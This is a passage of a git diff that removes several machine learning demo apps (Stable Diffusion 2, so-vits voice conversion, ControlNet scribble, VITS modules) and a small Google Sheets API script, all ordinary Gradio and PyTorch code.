cv2.COLOR_RGB2BGR) - img = wm_encoder.encode(img, 'dwtDct') - img = Image.fromarray(img[:, :, ::-1]) - return img - -#When running locally, you won`t have access to this, so you can remove this part -word_list_dataset = load_dataset("stabilityai/word-list", data_files="list.txt", use_auth_token=True) -word_list = word_list_dataset["train"]['text'] - -config = OmegaConf.load(CONFIG_PATH) -model = load_model_from_config(config, stable_diffusion_2_path) -device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu") -model = model.to(device) - -def parse_args(): - parser = argparse.ArgumentParser() - parser.add_argument( - "--prompt", - type=str, - nargs="?", - default="a professional photograph of an astronaut riding a triceratops", - help="the prompt to render" - ) - 
parser.add_argument( - "--outdir", - type=str, - nargs="?", - help="dir to write results to", - default="outputs/txt2img-samples" - ) - parser.add_argument( - "--steps", - type=int, - default=50, - help="number of ddim sampling steps", - ) - parser.add_argument( - "--plms", - action='store_true', - help="use plms sampling", - ) - parser.add_argument( - "--dpm", - action='store_true', - help="use DPM (2) sampler", - ) - parser.add_argument( - "--fixed_code", - action='store_true', - help="if enabled, uses the same starting code across all samples ", - ) - parser.add_argument( - "--ddim_eta", - type=float, - default=0.0, - help="ddim eta (eta=0.0 corresponds to deterministic sampling", - ) - parser.add_argument( - "--n_iter", - type=int, - default=3, - help="sample this often", - ) - parser.add_argument( - "--H", - type=int, - default=512, - help="image height, in pixel space", - ) - parser.add_argument( - "--W", - type=int, - default=512, - help="image width, in pixel space", - ) - parser.add_argument( - "--C", - type=int, - default=4, - help="latent channels", - ) - parser.add_argument( - "--f", - type=int, - default=8, - help="downsampling factor, most often 8 or 16", - ) - parser.add_argument( - "--n_samples", - type=int, - default=3, - help="how many samples to produce for each given prompt. 
A.k.a batch size", - ) - parser.add_argument( - "--n_rows", - type=int, - default=0, - help="rows in the grid (default: n_samples)", - ) - parser.add_argument( - "--scale", - type=float, - default=9.0, - help="unconditional guidance scale: eps = eps(x, empty) + scale * (eps(x, cond) - eps(x, empty))", - ) - parser.add_argument( - "--from-file", - type=str, - help="if specified, load prompts from this file, separated by newlines", - ) - parser.add_argument( - "--config", - type=str, - default="configs/stable-diffusion/v2-inference.yaml", - help="path to config which constructs model", - ) - parser.add_argument( - "--ckpt", - type=str, - help="path to checkpoint of model", - ) - parser.add_argument( - "--seed", - type=int, - default=42, - help="the seed (for reproducible sampling)", - ) - parser.add_argument( - "--precision", - type=str, - help="evaluate at this precision", - choices=["full", "autocast"], - default="autocast" - ) - parser.add_argument( - "--repeat", - type=int, - default=1, - help="repeat each prompt in file this often", - ) - opt = parser.parse_args() - return opt - -def infer(prompt, samples, steps, scale, seed): - opt = parse_args() - opt.seed = seed - seed_everything(seed) - - for filter in word_list: - if re.search(rf"\b{filter}\b", prompt): - raise gr.Error("Unsafe content found. 
Please try again with different prompts.") - - opt.n_samples = samples - opt.scale = scale - opt.prompt = prompt - opt.steps = steps - opt.n_iter = 1 - sampler = DPMSolverSampler(model) - os.makedirs(opt.outdir, exist_ok=True) - outpath = opt.outdir - - print("Creating invisible watermark encoder (see https://github.com/ShieldMnt/invisible-watermark)...") - wm = "SDV2" - wm_encoder = WatermarkEncoder() - wm_encoder.set_watermark('bytes', wm.encode('utf-8')) - - batch_size = opt.n_samples - n_rows = opt.n_rows if opt.n_rows > 0 else batch_size - if not opt.from_file: - prompt = opt.prompt - assert prompt is not None - data = [batch_size * [prompt]] - else: - print(f"reading prompts from {opt.from_file}") - with open(opt.from_file, "r") as f: - data = f.read().splitlines() - data = [p for p in data for i in range(opt.repeat)] - data = list(chunk(data, batch_size)) - prompt = prompt - assert prompt is not None - data = [batch_size * [prompt]] - - sample_path = os.path.join(outpath, "samples") - os.makedirs(sample_path, exist_ok=True) - sample_count = 0 - base_count = len(os.listdir(sample_path)) - grid_count = len(os.listdir(outpath)) - 1 - - opt.W = 768 - opt.H = 768 - - start_code = None - if opt.fixed_code: - start_code = torch.randn([opt.n_samples, opt.C, opt.H // opt.f, opt.W // opt.f], device=device) - - precision_scope = autocast if opt.precision == "autocast" else nullcontext - image_samples = [] - with torch.no_grad(), \ - precision_scope("cuda"), \ - model.ema_scope(): - all_samples = list() - for n in trange(opt.n_iter, desc="Sampling"): - for prompts in tqdm(data, desc="data"): - uc = None - if opt.scale != 1.0: - uc = model.get_learned_conditioning(batch_size * [""]) - if isinstance(prompts, tuple): - prompts = list(prompts) - c = model.get_learned_conditioning(prompts) - shape = [opt.C, opt.H // opt.f, opt.W // opt.f] - samples, _ = sampler.sample(S=opt.steps, - conditioning=c, - batch_size=opt.n_samples, - shape=shape, - verbose=False, - 
unconditional_guidance_scale=opt.scale, - unconditional_conditioning=uc, - eta=opt.ddim_eta, - x_T=start_code) - - x_samples = model.decode_first_stage(samples) - x_samples = torch.clamp((x_samples + 1.0) / 2.0, min=0.0, max=1.0) - - for x_sample in x_samples: - x_sample = 255. * rearrange(x_sample.cpu().numpy(), 'c h w -> h w c') - img = Image.fromarray(x_sample.astype(np.uint8)) - img = put_watermark(img, wm_encoder) - image_samples.append(img) - base_count += 1 - sample_count += 1 - - all_samples.append(x_samples) - return image_samples - -css = """ - .gradio-container { - font-family: 'IBM Plex Sans', sans-serif; - } - .gr-button { - color: white; - border-color: black; - background: black; - } - input[type='range'] { - accent-color: black; - } - .dark input[type='range'] { - accent-color: #dfdfdf; - } - .container { - max-width: 730px; - margin: auto; - padding-top: 1.5rem; - } - #gallery { - min-height: 22rem; - margin-bottom: 15px; - margin-left: auto; - margin-right: auto; - border-bottom-right-radius: .5rem !important; - border-bottom-left-radius: .5rem !important; - } - #gallery>div>.h-full { - min-height: 20rem; - } - .details:hover { - text-decoration: underline; - } - .gr-button { - white-space: nowrap; - } - .gr-button:focus { - border-color: rgb(147 197 253 / var(--tw-border-opacity)); - outline: none; - box-shadow: var(--tw-ring-offset-shadow), var(--tw-ring-shadow), var(--tw-shadow, 0 0 #0000); - --tw-border-opacity: 1; - --tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0 var(--tw-ring-offset-width) var(--tw-ring-offset-color); - --tw-ring-shadow: var(--tw-ring-inset) 0 0 0 calc(3px var(--tw-ring-offset-width)) var(--tw-ring-color); - --tw-ring-color: rgb(191 219 254 / var(--tw-ring-opacity)); - --tw-ring-opacity: .5; - } - #advanced-btn { - font-size: .7rem !important; - line-height: 19px; - margin-top: 12px; - margin-bottom: 12px; - padding: 2px 8px; - border-radius: 14px !important; - } - #advanced-options { - display: none; - margin-bottom: 
20px; - } - .footer { - margin-bottom: 45px; - margin-top: 35px; - text-align: center; - border-bottom: 1px solid #e5e5e5; - } - .footer>p { - font-size: .8rem; - display: inline-block; - padding: 0 10px; - transform: translateY(10px); - background: white; - } - .dark .footer { - border-color: #303030; - } - .dark .footer>p { - background: #0b0f19; - } - .acknowledgments h4{ - margin: 1.25em 0 .25em 0; - font-weight: bold; - font-size: 115%; - } - .animate-spin { - animation: spin 1s linear infinite; - } - @keyframes spin { - from { - transform: rotate(0deg); - } - to { - transform: rotate(360deg); - } - } - #share-btn-container { - display: flex; padding-left: 0.5rem !important; padding-right: 0.5rem !important; background-color: #000000; justify-content: center; align-items: center; border-radius: 9999px !important; width: 13rem; - margin-top: 10px; - margin-left: auto; - } - #share-btn { - all: initial; color: #ffffff;font-weight: 600; cursor:pointer; font-family: 'IBM Plex Sans', sans-serif; margin-left: 0.5rem !important; padding-top: 0.25rem !important; padding-bottom: 0.25rem !important;right:0; - } - #share-btn * { - all: unset; - } - #share-btn-container div:nth-child(-n+2){ - width: auto !important; - min-height: 0px !important; - } - #share-btn-container .wrap { - display: none !important; - } - .gr-form{ - flex: 1 1 50%; border-top-right-radius: 0; border-bottom-right-radius: 0; - } - #prompt-container{ - gap: 0; - } - #component-14{border-top-width: 1px !important} -""" - -block = gr.Blocks(css=css) - -examples = [ - [ - 'A high tech solarpunk utopia in the Amazon rainforest', - 4, - 45, - 7.5, - 1024, - ], - [ - 'A pikachu fine dining with a view to the Eiffel Tower', - 4, - 45, - 7, - 1024, - ], - [ - 'A mecha robot in a favela in expressionist style', - 4, - 45, - 7, - 1024, - ], - [ - 'an insect robot preparing a delicious meal', - 4, - 45, - 7, - 1024, - ], - [ - "A small cabin on top of a snowy mountain in the style of Disney, artstation", - 4, - 
45, - 7, - 1024, - ], -] - -with block: - gr.HTML( - """ -
    -
    - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    - Stable Diffusion 2 Demo -

    -
    -

    - Stable Diffusion 2 is the latest text-to-image model from StabilityAI. Access Stable Diffusion 1 Space here
    For faster generation and API - access you can try - DreamStudio Beta -

    -
    - """ - ) - with gr.Group(): - with gr.Box(): - with gr.Row(elem_id="prompt-container").style(mobile_collapse=False, equal_height=True): - text = gr.Textbox( - label="Enter your prompt", - show_label=False, - max_lines=1, - placeholder="Enter your prompt", - elem_id="prompt-text-input", - ).style( - border=(True, False, True, True), - rounded=(True, False, False, True), - container=False, - ) - btn = gr.Button("Generate image").style( - margin=False, - rounded=(False, True, True, False), - full_width=False, - ) - - gallery = gr.Gallery( - label="Generated images", show_label=False, elem_id="gallery" - ).style(grid=[2], height="auto") - - - - with gr.Accordion("Custom options", open=False): - samples = gr.Slider(label="Images", minimum=1, maximum=4, value=4, step=1) - steps = gr.Slider(label="Steps", minimum=1, maximum=50, value=25, step=1) - scale = gr.Slider( - label="Guidance Scale", minimum=0, maximum=50, value=9, step=0.1 - ) - seed = gr.Slider( - label="Seed", - minimum=0, - maximum=2147483647, - step=1, - randomize=True, - ) - - with gr.Group(): - with gr.Group(elem_id="share-btn-container"): - community_icon = gr.HTML(community_icon_html) - loading_icon = gr.HTML(loading_icon_html) - share_button = gr.Button("Share to community", elem_id="share-btn") - - ex = gr.Examples(examples=examples, fn=infer, inputs=[text, samples, steps, scale, seed], outputs=[gallery, community_icon, loading_icon, share_button], cache_examples=False) - ex.dataset.headers = [""] - - text.submit(infer, inputs=[text, samples, steps, scale, seed], outputs=[gallery]) - btn.click(infer, inputs=[text, samples, steps, scale, seed], outputs=[gallery]) - - share_button.click( - None, - [], - [], - _js=share_js, - ) - gr.HTML( - """ - -
    -

    LICENSE

    -The model is licensed with a CreativeML OpenRAIL++ license. The authors claim no rights on the outputs you generate, you are free to use them and are accountable for their use which must not go against the provisions set in this license. The license forbids you from sharing any content that violates any laws, produce any harm to a person, disseminate any personal information that would be meant for harm, spread misinformation and target vulnerable groups. For the full list of restrictions please read the license

    -

    Biases and content acknowledgment

    -Despite how impressive being able to turn text into image is, beware to the fact that this model may output content that reinforces or exacerbates societal biases, as well as realistic faces, pornography and violence. The model was trained on the LAION-5B dataset, which scraped non-curated image-text-pairs from the internet (the exception being the removal of illegal content) and is meant for research purposes. You can read more in the model card

    -
    - """ - ) - -block.queue(concurrency_count=1, max_size=25).launch(max_threads=150) \ No newline at end of file diff --git a/spaces/vorstcavry/vits-models-1/app.py b/spaces/vorstcavry/vits-models-1/app.py deleted file mode 100644 index a4739cd869f6fa5ff3a1cfd530381c878467bf87..0000000000000000000000000000000000000000 --- a/spaces/vorstcavry/vits-models-1/app.py +++ /dev/null @@ -1,139 +0,0 @@ -import os -import io -import gradio as gr -import librosa -import numpy as np -import utils -from inference.infer_tool import Svc -import logging -import soundfile -import asyncio -import argparse -import edge_tts -import gradio.processing_utils as gr_processing_utils -logging.getLogger('numba').setLevel(logging.WARNING) -logging.getLogger('markdown_it').setLevel(logging.WARNING) -logging.getLogger('urllib3').setLevel(logging.WARNING) -logging.getLogger('matplotlib').setLevel(logging.WARNING) - -limitation = os.getenv("SYSTEM") == "spaces" # limit audio length in huggingface spaces - -audio_postprocess_ori = gr.Audio.postprocess - -def audio_postprocess(self, y): - data = audio_postprocess_ori(self, y) - if data is None: - return None - return gr_processing_utils.encode_url_or_file_to_base64(data["name"]) - - -gr.Audio.postprocess = audio_postprocess -def create_vc_fn(model, sid): - def vc_fn(input_audio, vc_transform, auto_f0, tts_text, tts_voice, tts_mode): - if tts_mode: - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - raw_path = io.BytesIO() - soundfile.write(raw_path, audio, 16000, format="wav") - raw_path.seek(0) - out_audio, out_sr = model.infer(sid, vc_transform, raw_path, - auto_predict_f0=auto_f0, - ) - return "Success", (44100, out_audio.cpu().numpy()) - if input_audio is None: 
- return "You need to upload an audio", None - sampling_rate, audio = input_audio - duration = audio.shape[0] / sampling_rate - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - raw_path = io.BytesIO() - soundfile.write(raw_path, audio, 16000, format="wav") - raw_path.seek(0) - out_audio, out_sr = model.infer(sid, vc_transform, raw_path, - auto_predict_f0=auto_f0, - ) - return "Success", (44100, out_audio.cpu().numpy()) - return vc_fn - -def change_to_tts_mode(tts_mode): - if tts_mode: - return gr.Audio.update(visible=False), gr.Textbox.update(visible=True), gr.Dropdown.update(visible=True), gr.Checkbox.update(value=True) - else: - return gr.Audio.update(visible=True), gr.Textbox.update(visible=False), gr.Dropdown.update(visible=False), gr.Checkbox.update(value=False) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--device', type=str, default='cpu') - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - args = parser.parse_args() - hubert_model = utils.get_hubert_model().to(args.device) - models = [] - others = { - "rudolf": "https://huggingface.co/spaces/sayashi/sovits-rudolf", - "teio": "https://huggingface.co/spaces/sayashi/sovits-teio", - "goldship": "https://huggingface.co/spaces/sayashi/sovits-goldship", - "tannhauser": "https://huggingface.co/spaces/sayashi/sovits-tannhauser" - } - voices = [] - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - for r in tts_voice_list: - voices.append(f"{r['ShortName']}-{r['Gender']}") - for f in os.listdir("models"): - name = f - model = Svc(fr"models/{f}/{f}.pth", f"models/{f}/config.json", device=args.device) - cover = f"models/{f}/cover.png" if 
os.path.exists(f"models/{f}/cover.png") else None - models.append((name, cover, create_vc_fn(model, name))) - with gr.Blocks() as app: - gr.Markdown( - "#
    Sovits Models\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=sayashi.Sovits-Umamusume)\n\n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1wfsBbMzmtLflOJeqc5ZnJiLY7L239hJW?usp=share_link)\n\n" - "[![Duplicate this Space](https://huggingface.co/datasets/huggingface/badges/raw/main/duplicate-this-space-sm-dark.svg)](https://huggingface.co/spaces/sayashi/sovits-models?duplicate=true)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/svc-develop-team/so-vits-svc)" - - ) - with gr.Tabs(): - for (name, cover, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'' if cover else "" - '
    ' - ) - with gr.Row(): - with gr.Column(): - vc_input = gr.Audio(label="Input audio"+' (less than 20 seconds)' if limitation else '') - vc_transform = gr.Number(label="vc_transform", value=0) - auto_f0 = gr.Checkbox(label="auto_f0", value=False) - tts_mode = gr.Checkbox(label="tts (use edge-tts as input)", value=False) - tts_text = gr.Textbox(visible=False, label="TTS text (100 words limitation)" if limitation else "TTS text") - tts_voice = gr.Dropdown(choices=voices, visible=False) - vc_submit = gr.Button("Generate", variant="primary") - with gr.Column(): - vc_output1 = gr.Textbox(label="Output Message") - vc_output2 = gr.Audio(label="Output Audio") - vc_submit.click(vc_fn, [vc_input, vc_transform, auto_f0, tts_text, tts_voice, tts_mode], [vc_output1, vc_output2]) - tts_mode.change(change_to_tts_mode, [tts_mode], [vc_input, tts_text, tts_voice, auto_f0]) - for category, link in others.items(): - with gr.TabItem(category): - gr.Markdown( - f''' -
    -

    Click to Go

    - - -
    - ''' - ) - app.queue(concurrency_count=1, api_open=args.api).launch(share=args.share) diff --git a/spaces/whitphx/gradio-static-test/dist/assets/Info-7e9477b8.js b/spaces/whitphx/gradio-static-test/dist/assets/Info-7e9477b8.js deleted file mode 100644 index fd29967b87fd0d3e31f46dcde75fb376b4ed7e94..0000000000000000000000000000000000000000 --- a/spaces/whitphx/gradio-static-test/dist/assets/Info-7e9477b8.js +++ /dev/null @@ -1,2 +0,0 @@ -import{S as i,i as r,s as u,W as f,H as _,D as c,h as p,Y as m,Z as d,$,q as v,t as g,r as h}from"../lite.js";import"./Button-0391b19a.js";function q(n){let s,a;const l=n[1].default,e=f(l,n,n[0],null);return{c(){s=_("div"),e&&e.c(),c(s,"class","svelte-e8n7p6")},m(t,o){p(t,s,o),e&&e.m(s,null),a=!0},p(t,[o]){e&&e.p&&(!a||o&1)&&m(e,l,t,t[0],a?$(l,t[0],o,null):d(t[0]),null)},i(t){a||(v(e,t),a=!0)},o(t){g(e,t),a=!1},d(t){t&&h(s),e&&e.d(t)}}}function I(n,s,a){let{$$slots:l={},$$scope:e}=s;return n.$$set=t=>{"$$scope"in t&&a(0,e=t.$$scope)},[e,l]}class C extends i{constructor(s){super(),r(this,s,I,q,u,{})}}export{C as I}; -//# sourceMappingURL=Info-7e9477b8.js.map diff --git a/spaces/willgibs/ControlNet-v1-1/app_scribble.py b/spaces/willgibs/ControlNet-v1-1/app_scribble.py deleted file mode 100644 index 39c14fe7918df45a93ec0485a793886d028142bd..0000000000000000000000000000000000000000 --- a/spaces/willgibs/ControlNet-v1-1/app_scribble.py +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/env python - -import gradio as gr - -from utils import randomize_seed_fn - - -def create_demo(process, max_images=12, default_num_images=3): - with gr.Blocks() as demo: - with gr.Row(): - with gr.Column(): - image = gr.Image() - prompt = gr.Textbox(label='Prompt') - run_button = gr.Button('Run') - with gr.Accordion('Advanced options', open=False): - preprocessor_name = gr.Radio( - label='Preprocessor', - choices=['HED', 'PidiNet', 'None'], - type='value', - value='HED') - num_samples = gr.Slider(label='Number of images', - minimum=1, - maximum=max_images, - 
value=default_num_images, - step=1) - image_resolution = gr.Slider(label='Image resolution', - minimum=256, - maximum=512, - value=512, - step=256) - preprocess_resolution = gr.Slider( - label='Preprocess resolution', - minimum=128, - maximum=512, - value=512, - step=1) - num_steps = gr.Slider(label='Number of steps', - minimum=1, - maximum=100, - value=20, - step=1) - guidance_scale = gr.Slider(label='Guidance scale', - minimum=0.1, - maximum=30.0, - value=9.0, - step=0.1) - seed = gr.Slider(label='Seed', - minimum=0, - maximum=1000000, - step=1, - value=0, - randomize=True) - randomize_seed = gr.Checkbox(label='Randomize seed', - value=True) - a_prompt = gr.Textbox( - label='Additional prompt', - value='best quality, extremely detailed') - n_prompt = gr.Textbox( - label='Negative prompt', - value= - 'longbody, lowres, bad anatomy, bad hands, missing fingers, extra digit, fewer digits, cropped, worst quality, low quality' - ) - with gr.Column(): - result = gr.Gallery(label='Output', show_label=False).style( - columns=2, object_fit='scale-down') - inputs = [ - image, - prompt, - a_prompt, - n_prompt, - num_samples, - image_resolution, - preprocess_resolution, - num_steps, - guidance_scale, - seed, - preprocessor_name, - ] - prompt.submit( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - ) - run_button.click( - fn=randomize_seed_fn, - inputs=[seed, randomize_seed], - outputs=seed, - queue=False, - ).then( - fn=process, - inputs=inputs, - outputs=result, - api_name='scribble', - ) - return demo - - -if __name__ == '__main__': - from model import Model - model = Model(task_name='scribble') - demo = create_demo(model.process_scribble) - demo.queue().launch() diff --git a/spaces/wonbeom/prompter_day_demo1/spreadsheet.py b/spaces/wonbeom/prompter_day_demo1/spreadsheet.py deleted file mode 100644 index 
21c46422fff5843d1947141f2947bd2860cb01d4..0000000000000000000000000000000000000000 --- a/spaces/wonbeom/prompter_day_demo1/spreadsheet.py +++ /dev/null @@ -1,38 +0,0 @@ -import pickle -import os.path -from google_auth_oauthlib.flow import InstalledAppFlow -from google.auth.transport.requests import Request -from googleapiclient.discovery import build - -# Scopes required for the API calls -SCOPES = ['https://www.googleapis.com/auth/spreadsheets'] - -# Obtain user credentials and build the Google Sheets API service object -creds = None -if os.path.exists('token.pickle'): - with open('token.pickle', 'rb') as token: - creds = pickle.load(token) - -if not creds or not creds.valid: - if creds and creds.expired and creds.refresh_token: - creds.refresh(Request()) - else: - flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES) - creds = flow.run_local_server(port=0) - with open('token.pickle', 'wb') as token: - pickle.dump(creds, token) - -service = build('sheets', 'v4', credentials=creds) - -# Call the Sheets API -SPREADSHEET_ID = '14yCWD9JQWIcPhBejCtWeiSYeh6O8yFz9hNSJIbXZIkc' -RANGE_NAME = 'Sheet1!A1:A7' - -result = service.spreadsheets().values().get(spreadsheetId=SPREADSHEET_ID, range=RANGE_NAME).execute() -values = result.get('values', []) - -if not values: - print('No data found.') -else: - for row in values: - print(', '.join(row)) \ No newline at end of file diff --git a/spaces/wonderit-safeai/tts-announcer/modules.py b/spaces/wonderit-safeai/tts-announcer/modules.py deleted file mode 100644 index 9c7fd9cd6eb8b7e0ec0e08957e970744a374a924..0000000000000000000000000000000000000000 --- a/spaces/wonderit-safeai/tts-announcer/modules.py +++ /dev/null @@ -1,390 +0,0 @@ -import copy -import math -import numpy as np -import scipy -import torch -from torch import nn -from torch.nn import functional as F - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm - -import commons -from commons import init_weights, get_padding -from
transforms import piecewise_rational_quadratic_transform - - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." - - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential( - nn.ReLU(), - nn.Dropout(p_dropout)) - for _ in range(n_layers-1): - self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size//2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - 
self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size ** i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append(nn.Conv1d(channels, channels, kernel_size, - groups=channels, dilation=dilation, padding=padding - )) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0): - super(WN, self).__init__() - assert(kernel_size % 2 == 1) - self.hidden_channels =hidden_channels - self.kernel_size = kernel_size, - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d(gin_channels, 2*hidden_channels*n_layers, 1) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name='weight') - - for i in range(n_layers): - dilation = dilation_rate ** i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d(hidden_channels, 2*hidden_channels, kernel_size, - dilation=dilation, padding=padding) - in_layer = torch.nn.utils.weight_norm(in_layer, name='weight') - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 
* hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name='weight') - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:,cond_offset:cond_offset+2*self.hidden_channels,:] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply( - x_in, - g_l, - n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:,:self.hidden_channels,:] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:,self.hidden_channels:,:] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]))) - ]) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList([ - 
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))) - ]) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))) - ]) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = 
